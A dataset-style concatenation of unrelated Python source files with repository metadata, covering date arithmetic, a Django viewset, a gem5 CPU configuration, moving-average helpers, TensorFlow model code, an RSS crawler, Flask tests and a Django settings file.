from datetime import datetime
val1 = datetime.now()
val2 = datetime(2022, 1, 1, 00, 00, 00)
print(val2 - val1)
print(f'The 1st of January in {val2 - val1} hours')
def mins_alive(year, month, day):
birth_date = datetime(year, month, day)
now = datetime.now()
time_since = now - birth_date
minutes = int(time_since.total_seconds()/60)
print(f'you have been alive for {minutes} minutes')
mins_alive(1990, 4, 22)
string = "19 Nov 2015 18:45:00.000"
date = datetime.strptime(string, "%d %b %Y %H:%M:%S.%f")
print(date)
def time_to_holiday(year, month, day, holiday='Chanukah'):
now_date = datetime.now()
holiday_date = datetime(year, month, day)
time_left = holiday_date - now_date
print(f'The next holiday is {holiday} and is in {time_left} hours')
time_to_holiday(2021, 9, 15)
def age_on_planet(planet, orbital_period, seconds):
earth_years = seconds/(31557600*orbital_period)
print(f'You are {earth_years} Earth-years old on {planet}')
age_on_planet('Earth', 1, 1000000000)
from faker import Faker
faker = Faker()
print(f'name: {faker.name()}')
def populate_users():
users = []
profile = {'name': faker.name(), 'address': faker.address(), 'langage_code': faker.langage_code()}
users.append(profile)
print(users)
populate_users()
# try:
# import timedelta
# print('module time is installed')
# except ModuleNotFoundError:
# print('module time is not installed')
|
[
"nigel.salem@rocketmail.com"
] |
nigel.salem@rocketmail.com
|
3e81fbe984615e1803e95416d5ffff5e86447a53
|
c25ea06dcae67540973fde2e10be62e6002df2f0
|
/backoffice/views/item.py
|
0f1815572cd6e1c749649e20b69eb0d14de9de76
|
[] |
no_license
|
Youngiyong/giyong-api
|
df021c1bc0b147021f74f05eef714d85e0e055f4
|
dbd723fa1e2312537d545ac125d6bdc2349ccab2
|
refs/heads/main
| 2023-07-04T12:34:26.090858
| 2021-08-10T13:33:34
| 2021-08-10T13:33:34
| 390,406,924
| 1
| 1
| null | 2021-08-05T15:06:16
| 2021-07-28T15:46:27
|
Python
|
UTF-8
|
Python
| false
| false
| 731
|
py
|
from rest_framework import viewsets
from backoffice.models import SiteGoods
from backoffice.serializers.item import ItemSerializer
from giyong.responses import BackOfficeResponse
class ItemListViewSet(viewsets.GenericViewSet):
"""
아이템 리스트 조회
"""
model = SiteGoods;
serializer_class = ItemSerializer
def get_queryset(self):
queryset = self.model.objects.all()
return queryset
def list(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
serializer = self.get_serializer(queryset, {"request": request}, many=True)
serializer.is_valid(raise_exception=True)
return BackOfficeResponse(data=serializer.data)
|
[
"youn9354@naver.com"
] |
youn9354@naver.com
|
82548f0b1cfae60c5a691672836b84e9b191992e
|
ae5e5c1bb869fd72598aa94a549161aab02a2d51
|
/configs/common/O3_ARM_v7a.py
|
bbcec74963d96e8bef2f1888679659bd96dea191
|
[] |
no_license
|
chrisjia6412/GEM5
|
89a74df84a7be6edf348384d9716e5da837a472d
|
260c5090de84ddbd1a42fab436ba34ed64a63c91
|
refs/heads/master
| 2021-01-13T01:55:10.875601
| 2014-07-12T19:37:01
| 2014-07-12T19:37:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,294
|
py
|
# Copyright (c) 2012 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ron Dreslinski
from m5.objects import *
# Simple ALU Instructions have a latency of 1
class O3_ARM_v7a_Simple_Int(FUDesc):
opList = [ OpDesc(opClass='IntAlu', opLat=1) ]
count = 2
# Complex ALU instructions have a variable latencies
class O3_ARM_v7a_Complex_Int(FUDesc):
opList = [ OpDesc(opClass='IntMult', opLat=3, issueLat=1),
OpDesc(opClass='IntDiv', opLat=12, issueLat=12),
OpDesc(opClass='IprAccess', opLat=3, issueLat=1) ]
count = 1
# Floating point and SIMD instructions
class O3_ARM_v7a_FP(FUDesc):
opList = [ OpDesc(opClass='SimdAdd', opLat=4),
OpDesc(opClass='SimdAddAcc', opLat=4),
OpDesc(opClass='SimdAlu', opLat=4),
OpDesc(opClass='SimdCmp', opLat=4),
OpDesc(opClass='SimdCvt', opLat=3),
OpDesc(opClass='SimdMisc', opLat=3),
OpDesc(opClass='SimdMult',opLat=5),
OpDesc(opClass='SimdMultAcc',opLat=5),
OpDesc(opClass='SimdShift',opLat=3),
OpDesc(opClass='SimdShiftAcc', opLat=3),
OpDesc(opClass='SimdSqrt', opLat=9),
OpDesc(opClass='SimdFloatAdd',opLat=5),
OpDesc(opClass='SimdFloatAlu',opLat=5),
OpDesc(opClass='SimdFloatCmp', opLat=3),
OpDesc(opClass='SimdFloatCvt', opLat=3),
OpDesc(opClass='SimdFloatDiv', opLat=3),
OpDesc(opClass='SimdFloatMisc', opLat=3),
OpDesc(opClass='SimdFloatMult', opLat=3),
OpDesc(opClass='SimdFloatMultAcc',opLat=1),
OpDesc(opClass='SimdFloatSqrt', opLat=9),
OpDesc(opClass='FloatAdd', opLat=5),
OpDesc(opClass='FloatCmp', opLat=5),
OpDesc(opClass='FloatCvt', opLat=5),
OpDesc(opClass='FloatDiv', opLat=9, issueLat=9),
OpDesc(opClass='FloatSqrt', opLat=33, issueLat=33),
OpDesc(opClass='FloatMult', opLat=4) ]
count = 2
# Load/Store Units
class O3_ARM_v7a_Load(FUDesc):
opList = [ OpDesc(opClass='MemRead',opLat=2) ]
count = 1
class O3_ARM_v7a_Store(FUDesc):
opList = [OpDesc(opClass='MemWrite',opLat=2) ]
count = 1
# Functional Units for this CPU
class O3_ARM_v7a_FUP(FUPool):
FUList = [O3_ARM_v7a_Simple_Int(), O3_ARM_v7a_Complex_Int(),
O3_ARM_v7a_Load(), O3_ARM_v7a_Store(), O3_ARM_v7a_FP()]
# Tournament Branch Predictor
class O3_ARM_v7a_BP(BranchPredictor):
predType = "tournament"
localPredictorSize = 2048
localCtrBits = 2
localHistoryTableSize = 1024
globalPredictorSize = 8192
globalCtrBits = 2
choicePredictorSize = 8192
choiceCtrBits = 2
BTBEntries = 2048
BTBTagSize = 18
RASSize = 16
instShiftAmt = 2
class O3_ARM_v7a_3(DerivO3CPU):
LQEntries = 16
SQEntries = 16
LSQDepCheckShift = 0
LFSTSize = 1024
SSITSize = 1024
decodeToFetchDelay = 1
renameToFetchDelay = 1
iewToFetchDelay = 1
commitToFetchDelay = 1
renameToDecodeDelay = 1
iewToDecodeDelay = 1
commitToDecodeDelay = 1
iewToRenameDelay = 1
commitToRenameDelay = 1
commitToIEWDelay = 1
fetchWidth = 3
fetchBufferSize = 16
fetchToDecodeDelay = 3
decodeWidth = 3
decodeToRenameDelay = 2
renameWidth = 3
renameToIEWDelay = 1
issueToExecuteDelay = 1
dispatchWidth = 6
issueWidth = 8
wbWidth = 8
wbDepth = 1
fuPool = O3_ARM_v7a_FUP()
iewToCommitDelay = 1
renameToROBDelay = 1
commitWidth = 8
squashWidth = 8
trapLatency = 13
backComSize = 5
forwardComSize = 5
numPhysIntRegs = 128
numPhysFloatRegs = 128
numIQEntries = 32
numROBEntries = 40
switched_out = False
branchPred = O3_ARM_v7a_BP()
# Instruction Cache
class O3_ARM_v7a_ICache(BaseCache):
hit_latency = 1
response_latency = 1
mshrs = 2
tgts_per_mshr = 8
size = '32kB'
assoc = 4
is_top_level = 'true'
# Data Cache
class O3_ARM_v7a_DCache(BaseCache):
hit_latency = 2
response_latency = 2
mshrs = 6
tgts_per_mshr = 8
size = '32kB'
assoc = 8
write_buffers = 16
is_top_level = 'true'
# TLB Cache
# Use a cache as a L2 TLB
class O3_ARM_v7aWalkCache(BaseCache):
hit_latency = 4
response_latency = 4
mshrs = 6
tgts_per_mshr = 8
size = '1kB'
assoc = 8
write_buffers = 16
is_top_level = 'true'
# L2 Cache
class O3_ARM_v7aL2(BaseCache):
hit_latency = 12
response_latency = 12
mshrs = 16
tgts_per_mshr = 8
size = '1MB'
assoc = 16
write_buffers = 8
prefetch_on_access = 'true'
# Simple stride prefetcher
prefetcher = StridePrefetcher(degree=8, latency = 1)
|
[
"qi@qi-VirtualBox.(none)"
] |
qi@qi-VirtualBox.(none)
|
350ffd8fca7ec36b99c6cffa4ee976cbf5f708c8
|
493d280a1c687711d3aed80ddade8e19848c0234
|
/venv/bin/django-admin.py
|
827bcc6fa1d5c23aca50a8fcdc385a3a56eb5a49
|
[] |
no_license
|
GeovaneBarros/Venda-Produtos
|
d88d6ad5fa06c761c7bdb096ae84d75b19de8a82
|
b8a94f7d64292e0126ecc27d43057bdbcb558626
|
refs/heads/master
| 2023-07-03T05:58:39.489996
| 2021-08-03T15:02:10
| 2021-08-03T15:02:10
| 388,113,078
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 697
|
py
|
#!/home/geovane/Documentos/git/Venda-Produtos/venv/bin/python3
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
|
[
"geovane@pop-os.localdomain"
] |
geovane@pop-os.localdomain
|
fccd084a55ab599772595c582a1d51697189a8a5
|
7bf91a0bd76d02c3f15952b851e6c32f190f5619
|
/EMAHelperFunctions.py
|
d2f0b8203bc0eff91aafe947961002e5ecc278fc
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
kilolux/fsp-demos
|
bd4d21ddf5b8c0a25621842d3b2a6ee6c096d9ac
|
50e96a10729477042b10291471c812d10bfd54fc
|
refs/heads/master
| 2021-04-12T19:10:25.381198
| 2020-11-16T00:26:59
| 2020-11-16T00:26:59
| 249,102,873
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,927
|
py
|
# EMAHelperFunctions.py
#################################################################
## Libraries
import matplotlib.pyplot as plt
import numpy as np
################################################################
## Exponential Moving Average (EMA) Functions
# Calculate the alpha value for a desired period.
def calculateAlpha(ema_period):
alpha = 2.0 / (ema_period + 1)
return alpha
# Returns the denominator
def getDenominator(number_of_terms):
# bottom = 1 + (1-a) + (1-a)^2 + (1-a)^3 + ...
a = calculateAlpha(number_of_terms)
i = 0
total = 0
while i < number_of_terms:
term = (1-a)**i
total = total + term
i = i + 1
return total
# Returns the numerator
def getNumerator(price_data, price_data_index, number_of_terms):
# top = p1 + (1-a)*p2 + (1-a)^2*p3 + (1-a)^3*p4 + ...
a = calculateAlpha(number_of_terms)
i = 0
total = 0
while i < number_of_terms:
price = price_data[price_data_index - i]
cof = (1-a)**i
term = price * cof
total = total + term
i = i + 1
return total
# Returns a single Exponential Moving Average value.
def getEMA(price_data, price_data_index, number_of_terms):
if (number_of_terms - price_data_index) > 1:
# There are too many terms for the given index.
return 0
else:
top = getNumerator(price_data, price_data_index, number_of_terms)
bottom = getDenominator(number_of_terms)
EMA = np.array([top / bottom])
return EMA
# Returns a list of all EMA values.
def getEMAdataset(price_data, number_of_terms):
ema_data = np.zeros(np.size(price_data))
i = 0
while i < np.size(price_data):
datum = getEMA(price_data, i, number_of_terms)
ema_data[i] = datum
i = i + 1
return ema_data
####################################################################
## Plotting Function
# Plots 3 lines: raw data, EMA(period_1), EMA(period_2)
def calculateAndPlotEMA(data, ema_period_1, ema_period_2):
ema_1 = getEMAdataset(data, ema_period_1)
ema_2 = getEMAdataset(data, ema_period_2)
x = np.arange(len(data))
plt.plot(x, data)
plt.plot(x, ema_1)
plt.plot(x, ema_2)
ema_legend_text_1 = "EMA(" + str(ema_period_1) + ")"
ema_legend_text_2 = "EMA(" + str(ema_period_2) + ")"
plt.legend(['Value', ema_legend_text_1, ema_legend_text_2])
plt.title("Exponential Moving Averages")
plt.grid(b=True, which='major', color='gray', linestyle=':')
plt.show()
########################################################################
## Sine Wave Function
# Generates a sine wave.
def generateSineWave(period, amplitude, sigma, end):
# Equations
alpha = amplitude / 2.0
beta = 2.0 * np.pi / period
frequency = 1.0 / period
x = np.arange(end + 1)
# Formula
y = alpha * np.sin(beta * x) + sigma
return y
|
[
"62257394+kilolux@users.noreply.github.com"
] |
62257394+kilolux@users.noreply.github.com
|
3d9d02fab501c681dd1ecb74fe34e9407ee3211e
|
2347a00aa41c023924de6bc4ffe0e8bc244a0f3f
|
/cms/apps.py
|
5c0101c5a82df0a517f36f405d25b64ac9d404f2
|
[] |
no_license
|
Dean-Christian-Armada/prod-people
|
2ac20d16aecb0cf1ae50a08e456060eee270b518
|
fb8d99394d78bbf4d1831223fce2d7ac4a04f34d
|
refs/heads/master
| 2021-01-01T16:19:36.904967
| 2016-01-26T09:20:36
| 2016-01-26T09:20:36
| 42,503,579
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 150
|
py
|
from django.apps import AppConfig
class YourAppConfig(AppConfig):
name = 'cms'
verbose_name = 'CMS Tables (Currently used in Documents only)'
|
[
"deanarmada@gmail.com"
] |
deanarmada@gmail.com
|
f3b885e952ddfedae93e7977d0e6c7f127bbdd7f
|
d7bfd78bdffdbf5a75141b06f7e4b94c295d0781
|
/models/ssd_mobilenet_v1_feature_extractor.py
|
844731cc6fa4e7a3f42b3e1e6fdf55deb6a67db2
|
[] |
no_license
|
shamanez/SSD-TF-OD
|
c4fa864851d289c99d7b56a95dda3b135d0a4520
|
6014db3ab275dd99fa779af16b6ec5a8a29bfb87
|
refs/heads/master
| 2021-01-19T14:21:03.754648
| 2017-09-07T23:00:16
| 2017-09-07T23:00:16
| 100,898,399
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,151
|
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SSDFeatureExtractor for MobilenetV1 features."""
import tensorflow as tf
from object_detection.meta_architectures import ssd_meta_arch
from object_detection.models import feature_map_generators
from nets import mobilenet_v1
slim = tf.contrib.slim
class SSDMobileNetV1FeatureExtractor(ssd_meta_arch.SSDFeatureExtractor): #this is the feature extractor class
"""SSD Feature Extractor using MobilenetV1 features."""
def __init__(self,
depth_multiplier, #this uses feature extrator convolutional hipher parameters
min_depth,
conv_hyperparams,
reuse_weights=None):
"""MobileNetV1 Feature Extractor for SSD Models.
Args:
depth_multiplier: float depth multiplier for feature extractor.
min_depth: minimum feature extractor depth.
conv_hyperparams: tf slim arg_scope for conv2d and separable_conv2d ops.
reuse_weights: Whether to reuse variables. Default is None.
"""
super(SSDMobileNetV1FeatureExtractor, self).__init__(
depth_multiplier, min_depth, conv_hyperparams, reuse_weights)
def preprocess(self, resized_inputs):
"""SSD preprocessing.
Maps pixel values to the range [-1, 1].
Args:
resized_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
"""
return (2.0 / 255.0) * resized_inputs - 1.0
def extract_features(self, preprocessed_inputs): #this will extract features from iamge w.r.t mobilenet archtecture
"""Extract features from preprocessed inputs.
Args:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
feature_maps: a list of tensors where the ith tensor has shape
[batch, height_i, width_i, depth_i]
"""
preprocessed_inputs.get_shape().assert_has_rank(4)
shape_assert = tf.Assert(
tf.logical_and(tf.greater_equal(tf.shape(preprocessed_inputs)[1], 33),
tf.greater_equal(tf.shape(preprocessed_inputs)[2], 33)),
['image size must at least be 33 in both height and width.'])
feature_map_layout = {
'from_layer': ['Conv2d_11_pointwise', 'Conv2d_13_pointwise', '', '', #we first extract 2 layers from mobilenet
'', ''],
'layer_depth': [-1, -1, 512, 256, 256, 128], #for first two things it's -1 means we directly take the depth as in the feature maps
}
with tf.control_dependencies([shape_assert]):
#with following we apply all the hyperparams in the scrip by keeping arg scope free
with slim.arg_scope(self._conv_hyperparams): #arg score - Here the convolutional hyper params are for feature extractor we create ot
with tf.variable_scope('MobilenetV1',
reuse=self._reuse_weights) as scope:
_, image_features = mobilenet_v1.mobilenet_v1_base( #getting the feature extracted from mobilnet in the slim
preprocessed_inputs,
final_endpoint='Conv2d_13_pointwise', #this is extracting the features
min_depth=self._min_depth, #our min deph is 16 , It's like our depth of the feature extator
depth_multiplier=self._depth_multiplier, #there is 1 we take all the layers in depth demension
scope=scope) #this is a dicrionalt with names of the feature maps and feature maps
#the following function can extract the features from above feature maps , also it can create new one's too acording to the output stride thing which we are not using Alos we give a featue map lay_out what should be there , and this also can create addicitonal feature maps
feature_maps = feature_map_generators.multi_resolution_feature_maps( #This is for generating feature maps
feature_map_layout=feature_map_layout, #wanted feature maps extracted from above model maps and create new maps for empty things
depth_multiplier=self._depth_multiplier, #depth multi-plier
min_depth=self._min_depth, #this is 16
insert_1x1_conv=True, #
image_features=image_features) #feature dictionary
return feature_maps.values() #list of 6 feature maps for the ssd
|
[
"noreply@github.com"
] |
shamanez.noreply@github.com
|
b64206a2f26f54d43768e905ca9eff0c32090d13
|
447e493fddbf4d7c6496050e5f5c7b6f4f4a9a1f
|
/lib/tfflat/saver.py
|
0e32673894271849c6c346f911aa321478b3421d
|
[] |
no_license
|
mks0601/TF-SimpleHumanPose
|
46e1fb1c54c7c33305edcdef9de0c187a1abce89
|
58cc1ca86e302ba3d426c10e7c8030a6b2d00158
|
refs/heads/master
| 2022-07-11T15:00:29.350604
| 2022-07-01T03:17:33
| 2022-07-01T03:17:33
| 164,132,208
| 360
| 96
| null | 2019-05-24T12:43:59
| 2019-01-04T16:49:08
|
Python
|
UTF-8
|
Python
| false
| false
| 2,420
|
py
|
import tensorflow as tf
from tensorflow.python import pywrap_tensorflow
import numpy as np
from config import cfg
import os
import os.path as osp
def get_variables_in_checkpoint_file(file_name):
try:
reader = pywrap_tensorflow.NewCheckpointReader(file_name)
var_to_shape_map = reader.get_variable_to_shape_map()
return reader, var_to_shape_map
except Exception as e: # pylint: disable=broad-except
print(str(e))
if "corrupted compressed block contents" in str(e):
print(
"It's likely that your checkpoint file has been compressed "
"with SNAPPY.")
class Saver(object):
def __init__(self, sess, var_list, model_dump_dir, name_prefix='snapshot'):
self.sess = sess
self.var_list = var_list
self.model_dump_dir = model_dump_dir
self._name_prefix = name_prefix
self.saver = tf.train.Saver(var_list=var_list, max_to_keep=100000)
def save_model(self, iter):
filename = '{}_{:d}'.format(self._name_prefix, iter) + '.ckpt'
if not os.path.exists(self.model_dump_dir):
os.makedirs(self.model_dump_dir)
filename = os.path.join(self.model_dump_dir, filename)
self.saver.save(self.sess, filename)
print('Wrote snapshot to: {:s}'.format(filename))
def load_model(sess, model_path):
#TODO(global variables ?? how about _adam weights)
variables = tf.global_variables()
reader, var_keep_dic = get_variables_in_checkpoint_file(model_path)
if 'global_step' in var_keep_dic:
var_keep_dic.pop('global_step')
# vis_var_keep_dic = []
variables_to_restore = {}
changed_variables = {}
for v in variables:
v_name = v.name.split(':')[0]
if v_name in var_keep_dic:
# print('Varibles restored: %s' % v.name)
#variables_to_restore.append(v)
variables_to_restore[v_name] = v
# vis_var_keep_dic.append(v.name.split(':')[0])
else:
# print('Unrestored Variables: %s' % v.name)
pass
# print('Extra Variables in ckpt', set(var_keep_dic) - set(vis_var_keep_dic))
if len(variables_to_restore) > 0:
restorer = tf.train.Saver(variables_to_restore)
restorer.restore(sess, model_path)
else:
print('No variables in {} fits the network'.format(model_path))
|
[
"mks0601@gmail.com"
] |
mks0601@gmail.com
|
8e34d4ac2b102606b68cc04de8de6218ce2c7fe6
|
396b4d5a3361dda0afc3a05ab06ed4b5aa8fa59a
|
/thinkhard/feedcrawler.py
|
b3d0d4b5782ebbf1834778b0da27fcee2195ed67
|
[] |
no_license
|
darlinglele/portal
|
7a0a8e410032fef3040d0b350254a3e044ee9c65
|
5f5265f06ee65aa98ee9e03a95f6433cac7fd36c
|
refs/heads/master
| 2020-05-29T12:36:55.817604
| 2018-02-02T05:59:27
| 2018-02-02T05:59:27
| 42,295,790
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,299
|
py
|
#encoding=utf8
import time
from datetime import datetime
from time import mktime
import socket
import feedparser
import threadpool
class FeedCrawler():
def __init__(self,task):
socket.setdefaulttimeout(task['timeout'])
self.pool =threadpool.ThreadPool(task['pool_size'])
self.sources = task['sources']
self.feeds = []
def request(self,source):
try:
feeder = feedparser.parse(source)
if 'title' in feeder.feed.keys():
site_title = feeder.feed['title']
else:
site_title =u"No title found"
for entry in feeder.entries:
feed = {'site_url': source,'site_title': unicode(site_title)}
for item in ['title', 'link','summary','content','published_parsed','tags','author','summary_detail']:
if item in entry.keys():
feed[item] =entry[item]
feed['published_parsed']=datetime.fromtimestamp(mktime(feed['published_parsed']))
if 'content' not in feed.keys():
feed['content'] = feed['summary']
else:
feed['content'] = feed['content'][0]['value']
self.feeds.append(feed)
except Exception, e:
print e
def crawl(self):
requests = threadpool.makeRequests(self.request,self.sources, None)
for req in requests:
self.pool.putRequest(req)
self.pool.wait()
self.pool.wait()
return self.feeds
|
[
"ubuntu@ip-172-31-12-43.ap-northeast-1.compute.internal"
] |
ubuntu@ip-172-31-12-43.ap-northeast-1.compute.internal
|
f3b0d783e5c1cb327f39b4a39392f55baaebe8a5
|
3ab965efcb9f20502a6420a844204b1d825268fa
|
/identidock/app/tests.py
|
c470e8821e66e25cc426f159cf41b06d2da8b050
|
[] |
no_license
|
kovtalex/deploying-containers
|
456118ff39e2fdcc3107f0be68662c301af221cf
|
cce61d8dea56a543e1e929dacfca6585385d79c4
|
refs/heads/master
| 2021-03-27T21:24:57.851820
| 2020-04-01T13:36:33
| 2020-04-01T13:36:33
| 247,808,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 613
|
py
|
import unittest
import identidock
class TestCase(unittest.TestCase):
def setUp(self):
identidock.app.config["TESTING"] = True
self.app = identidock.app.test_client()
def test_get_mainpage(self):
page = self.app.post("/", data=dict(name="Moby Dock"))
assert page.status_code == 200
assert 'Hello' in str(page.data)
assert 'Moby Dock' in str(page.data)
def test_html_escaping(self):
page = self.app.post("/", data=dict(name='"><b>TEST</b><!--'))
assert '<b>' not in str(page.data)
if __name__ == '__main__':
unittest.main()
|
[
"kovtalex@gmail.com"
] |
kovtalex@gmail.com
|
2284ba207ad2b43f708f3b94f9c3b91c002d5c4f
|
1d7acb2644c84490347360716c11c9a672820cd4
|
/ejecutable python/kmodelV4/main.py
|
e8707a1e8a34ca919de822b393b27cac3045da79
|
[
"Apache-2.0"
] |
permissive
|
SalvadorAlbarran/TFG2020
|
038345efd9cadac844cff1cc3cf6281d09ab38e8
|
ff2b6eae1a49b0b7f88909816ce18a0d1baad832
|
refs/heads/master
| 2022-11-07T12:47:08.571305
| 2020-06-24T15:58:43
| 2020-06-24T15:58:43
| 269,429,489
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 826
|
py
|
import sensor, image, lcd, time
import KPU as kpu
lcd.init()
sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framesize(sensor.QVGA)
sensor.set_windowing((224, 224))
sensor.set_vflip(1)
sensor.run(1)
lcd.clear()
lcd.draw_string(100,96,"MobileNet Demo")
lcd.draw_string(100,112,"Loading labels...")
f=open('labels.txt','r')
labels=f.readlines()
f.close()
task = kpu.load(0x200000)
a=kpu.set_outputs(task, 0, 1,1,1000) #it is add for V4
clock = time.clock()
while(True):
img = sensor.snapshot()
clock.tick()
fmap = kpu.forward(task, img)
fps=clock.fps()
plist=fmap[:]
pmax=max(plist)
max_index=plist.index(pmax)
a = lcd.display(img, oft=(0,0))
lcd.draw_string(0, 224, "%.2f:%s "%(pmax, labels[max_index].strip()))
print(fps)
a = kpu.deinit(task)
|
[
"66437479+SalvadorAlbarran@users.noreply.github.com"
] |
66437479+SalvadorAlbarran@users.noreply.github.com
|
011825657f266fd4b31c7a7d63955508c7cb9c0e
|
9e4349e34cf4ef17795142c8a46a347b3452738d
|
/.idea/python/Cosmonauts 1st HW.py
|
dcac485681d12e36341a48ba712fc2f28d079d8f
|
[] |
no_license
|
GreeNicee/SkillboxHM
|
5a1a88dabe7584d572218adb6acb00c3db9dd30e
|
c3538a3a33b641491f2acd33c5664e4ace0435b9
|
refs/heads/master
| 2020-04-01T10:20:38.961643
| 2018-10-15T13:33:35
| 2018-10-15T13:33:35
| 153,113,547
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,087
|
py
|
# Есть список космонавтов: имя, рост в см, вес в кг.
#Нужно вывести на консоль список всех космонавтов в формате
# Космонавт AAA, рост - BBB см, вес - CC кг
#А затем нужно вывести общее число космонавтов,
#минимальный и максимальный рост (с указанием имен)
#и общий вес космонавтов
#в формате
# Всего космонавтов XX человек.
# Минимальный рост - NNN см у XXX.
# Максимальный рост - NNN см у XXX.
# Общий вес космонавтов - ZZZ кг
cosmonauts = [
['Гагарин Юрий Алексеевич', 157, 68],
['Гайдуков Сергей Николаевич', 168, 72],
['Геворкян Владимир Мкртычович', 161, 70],
['Глазков Юрий Николаевич', 186, 95],
['Голованов Ярослав Кириллович', 172, 79],
['Горбатко Виктор Васильевич', 166, 64],
['Греков Николай Сергеевич', 178, 85],
['Гречаник Алексей Анатольевич', 182, 90],
['Гречко Георгий Михайлович', 190, 99],
['Грищенко Виталий Андреевич', 170, 77],
]
totalWeight = 0
for fullName, growth, weight in cosmonauts:
print('Космонавт ', fullName, ' рост - ', growth, 'см, вес - ', weight, ' кг')
totalWeight += weight
cosmonautsSorted = sorted(cosmonauts,key = lambda i: i[1])
minGrowth = cosmonautsSorted[0]
maxGrowth = cosmonautsSorted[len(cosmonautsSorted) - 1]
print('Всего космонавтов ', len(cosmonauts), ' человек')
print('Минимальный рост - ', minGrowth[1], 'см у ', minGrowth[0])
print('Максимальный рост - ', maxGrowth[1], 'см у ', maxGrowth[0])
print('Общий вес космонавтов - ', totalWeight, ' кг')
|
[
"ivan550zero@mail.ru"
] |
ivan550zero@mail.ru
|
9e5a07f65283e7fe0ea8edae909ebfdc45a58631
|
f17bb44a1d3b5102155f4cd251a0234bf2a50f87
|
/typeidea/settings.py
|
2febadaf5ef2b83224ef7939ba2ee4e953eccfb7
|
[] |
no_license
|
ScottYuan0805/django_test
|
4aadb9aba87f184d8e601d46645a8851093484ab
|
a0f9b5470892b6eed6d7add026671b54c6ba43a4
|
refs/heads/master
| 2020-09-04T20:15:13.156103
| 2019-11-05T06:50:17
| 2019-11-05T06:50:17
| 219,880,692
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,103
|
py
|
"""
Django settings for typeidea project.
Generated by 'django-admin startproject' using Django 1.11.26.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'r5=ire$20pv0zmoy2f0jt95wys65+^q2hcz!)47iw#wq+u!0et'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'typeidea.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
